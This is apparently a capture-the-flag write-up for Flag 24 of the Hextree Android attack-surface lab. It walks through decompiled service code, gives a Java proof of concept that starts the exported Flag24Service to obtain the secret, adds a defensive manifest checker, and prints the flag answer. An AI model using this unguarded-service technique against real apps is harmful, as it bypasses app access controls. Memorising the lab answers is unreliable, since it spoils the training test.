Challenge Requirements

Start a Service

Analysis

Flag24Activity

public class Flag24Activity extends AppCompactActivity {  
    public Flag24Activity() {  
        this.name = "Flag 24 - Basic service start";  
        this.tag = "Service";  
        this.tagColor = R.color.blue;  
        this.flag = "LyawUjxPt4tx+lYns1wrupDU3YaQ2t8bJmYW6BA+QUk=";  
        this.description = Flag24Service.class.getCanonicalName();  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity  
    protected void onCreate(Bundle bundle) {  
        super.onCreate(bundle);  
        this.f = new LogHelper(this);  
        Intent intent = getIntent();  
        String stringExtra = intent.getStringExtra("secret");  
        this.f.addTag(intent.getAction());  
        if (Flag24Service.secret.equals(stringExtra)) {  
            success(this);  
        }  
    }  
}

Upon reviewing the code, we notice that the success method fires only when the secret extra matches the secret value in Flag24Service, so let’s check that class’s code:

Flag24Service

public class Flag24Service extends Service {  
    public static String secret = UUID.randomUUID().toString();  
  
    @Override // android.app.Service  
    public int onStartCommand(Intent intent, int i, int i2) {  
        Log.i("Flag24Service", Utils.dumpIntent(this, intent));  
        if (intent.getAction().equals("io.hextree.services.START_FLAG24_SERVICE")) {  
            success();  
        }  
        return super.onStartCommand(intent, i, i2);  
    }  
  
    private void success() {  
        Intent intent = new Intent(this, (Class<?>) Flag24Activity.class);  
        intent.setAction("io.hextree.services.START_FLAG24_SERVICE");  
        intent.putExtra("secret", secret);  
        intent.addFlags(268468224);  
        intent.putExtra("hideIntent", true);  
        startActivity(intent);  
    }  
  
    @Override // android.app.Service  
    public IBinder onBind(Intent intent) {  
        throw new UnsupportedOperationException("Not yet implemented");  
    }  
}

As we can see, there’s no way for us to know the secret, as it’s random:

public static String secret = UUID.randomUUID().toString();  

But the service’s own success method also fires if the intent action equals io.hextree.services.START_FLAG24_SERVICE, and it launches Flag24Activity with the correct secret for us, so let’s create the PoC for it!

Creating the POC

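import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import androidx.appcompat.app.AppCompatActivity;

public class Flag24 extends AppCompatActivity {
    @Override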
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_flag24);
        getSupportActionBar().setTitle("Flag 24");
 
        Button button = findViewById(R.id.button_flag24);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Log.v("Tensai-POC", "Getting Flag 24");
                Intent serviceIntent = new Intent();
                serviceIntent.setAction("io.hextree.services.START_FLAG24_SERVICE");
                serviceIntent.setComponent(
                        new ComponentName("io.hextree.attacksurface",
                                "io.hextree.attacksurface.services.Flag24Service"));
                startService(serviceIntent);
            }
        });
    }
}

The code is pretty simple: we just send a start-service intent to Flag24Service with the needed action. I faced some issues at first as the app wasn’t running in the background, so make sure your target app is running in the background!
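
The PoC only works because Flag24Service can be started by any other app. As an added example (not part of the original write-up or the Hextree app), this Python check reads a decoded AndroidManifest.xml and lists services that are exported without an android:permission, which is how the exposure shows up in review. The manifest below is constructed, since the write-up does not show the real one; InternalService, GuardedService, LegacyService and the permission name are hypothetical.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest; only Flag24Service and its action come from the write-up.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="io.hextree.attacksurface">
  <application>
    <service android:name=".services.Flag24Service" android:exported="true">
      <intent-filter>
        <action android:name="io.hextree.services.START_FLAG24_SERVICE"/>
      </intent-filter>
    </service>
    <service android:name=".services.InternalService" android:exported="false"/>
    <service android:name=".services.GuardedService" android:exported="true"
        android:permission="io.hextree.attacksurface.permission.INTERNAL"/>
    <service android:name=".services.LegacyService">
      <intent-filter>
        <action android:name="io.hextree.services.LEGACY"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""


def open_services(manifest_xml):
    """Return (class name, actions) for services any other app can start."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    app = root.find("application")
    app_permission = app.get(ANDROID + "permission")
    findings = []
    for svc in app.findall("service"):
        actions = [a.get(ANDROID + "name") for a in svc.findall("intent-filter/action")]
        exported = svc.get(ANDROID + "exported")
        # No android:exported plus an intent filter means exported when targeting below Android 12.
        is_exported = exported == "true" or (exported is None and bool(actions))
        # The service's own permission overrides the application-level one.
        permission = svc.get(ANDROID + "permission") or app_permission
        if is_exported and not permission:
            name = svc.get(ANDROID + "name")
            name = package + name if name.startswith(".") else name
            findings.append((name, actions))
    return findings


if __name__ == "__main__":
    for name, actions in open_services(SAMPLE_MANIFEST):
        print(name, actions)
```

A service reported here should either set android:exported="false" or require a signature-level permission; a permission with normal protection level can be requested by any app and does not close the gap.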

Flag

HXT{basic-service-ha98sl}